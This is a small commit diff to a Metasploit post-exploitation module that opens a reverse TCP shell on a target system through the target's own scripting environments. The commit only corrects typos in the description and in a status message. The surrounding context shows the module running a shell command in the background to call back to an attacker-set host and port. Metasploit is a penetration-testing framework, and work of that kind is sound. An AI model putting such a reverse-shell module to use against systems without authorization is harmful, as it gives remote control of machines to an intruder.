Tweaky bits.

This commit is contained in:
Pearce Barry
2017-09-22 13:38:06 -05:00
parent 08dea910e1
commit f1be6b720b
+3 -3
View File
@@ -9,8 +9,8 @@ class MetasploitModule < Msf::Post
super( update_info( info,
'Name' => 'Multi Manage System Remote TCP Shell Session',
'Description' => %q{
This module will create a Reverse TCP Shell on the target system's
using the system own scripting environments installed on the
This module will create a Reverse TCP Shell on the target system
using the system's own scripting environments installed on the
target.
},
'License' => MSF_LICENSE,
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Post
end
if not cmd.empty?
print_status("Executing reverse tcp shel to #{lhost} on port #{lport}")
print_status("Executing reverse tcp shell to #{lhost} on port #{lport}")
cmd_exec("(#{cmd} &)")
end
end